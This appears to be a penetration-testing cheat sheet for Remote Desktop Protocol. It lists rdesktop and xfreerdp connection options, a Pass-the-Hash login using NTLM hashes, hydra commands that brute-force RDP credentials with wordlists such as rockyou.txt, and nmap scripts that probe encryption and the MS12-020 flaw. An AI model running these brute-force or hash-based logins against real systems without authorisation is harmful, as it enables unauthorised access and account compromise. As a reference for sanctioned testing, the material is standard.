Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information. We do not encourage any kind of illegal or harmful activity.
Introduction
RDP (Remote Desktop Protocol) is a Microsoft-developed protocol that allows users to connect and interact with another computer remotely. It provides a graphical interface, transmitting the user's display and inputs securely over a network. RDP is commonly used for remote computer management, IT support, and accessing work applications from afar. It's primarily used with Windows but is available for other operating systems as well.
RDP Access and Authentication Commands
| Command | Description |
| --- | --- |
| `rdesktop -u [USERNAME] -p [PASSWORD] [TARGET-IP]` | Starts a basic RDP connection, enabling desktop access with login credentials. |
| `xfreerdp /v:[TARGET-IP] /u:'USERNAME' /p:'PASSWORD' /drive:[NAME],[PATH]` | Establishes an RDP session with resource redirection, allowing local drives to be accessible during the remote session. Useful for transferring files between the host and the client. |
| `xfreerdp /u:'USERNAME' /d:[DOMAIN] /pth:[NTLM] /v:[SERVER].[DOMAIN].local` | Connects to an RDP session using Pass-the-Hash authentication. This method uses NTLM hashes instead of plain text passwords. |
Tips & tricks
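You can connect to the RDP server without supplying a password and gather information, such as the Windows version, from the login screen. This works only when Network Level Authentication (NLA) is not enforced; with NLA, the client must authenticate before the login screen is displayed.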
FreeRDP Connection Scenarios
| Command | Scenario |
| --- | --- |
| `xfreerdp /u:[USERNAME] /p:[PASSWORD] /v:[TARGET-IP] /sound:sys:alsa` | Connect to an RDP server and activate audio output redirection using the sys:alsa device |
| `xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /dynamic-resolution` | Connect to an RDP server with dynamic resolution |
| `xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] +clipboard` | Connect to an RDP server with clipboard redirection |
| `xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /cert:ignore` | Connect to an RDP server ignoring any certificate checks |
| `xfreerdp /v:[TARGET-IP] /u:[USERNAME] /p:[PASSWORD] /drive:share_name,path/to/directory` | Connect to an RDP server with a shared directory |
Brute-Forcing RDP Credentials
| Scenario | Command |
| --- | --- |
| Unknown User | `hydra -L user.txt -p "Password" -f rdp://[TARGET-IP]` |
| Unknown Password | `hydra -l user -P /opt/rockyou.txt -f rdp://[TARGET-IP]` |
| Unknown User and Password | `hydra -L user.txt -P /opt/rockyou.txt -f rdp://[TARGET-IP]` |
Nmap NSE Scripts
| Command | Description |
| --- | --- |
| `ls -la /usr/share/nmap/scripts \| grep "rdp"` | Lists available Nmap scripts that target RDP services, ideal for identifying potential security enhancements or vulnerabilities. |
| `nmap --script rdp-enum-encryption -p 3389 [IP_ADDRESS]` | Enumerates encryption methods supported by the RDP server, providing insights into the security level of the RDP connections. |
| `nmap --script rdp-vuln-ms12-020 -p 3389 [IP_ADDRESS]` | Checks for the notorious MS12-020 vulnerability, which, if present, could allow unauthorized remote code execution on the RDP server. |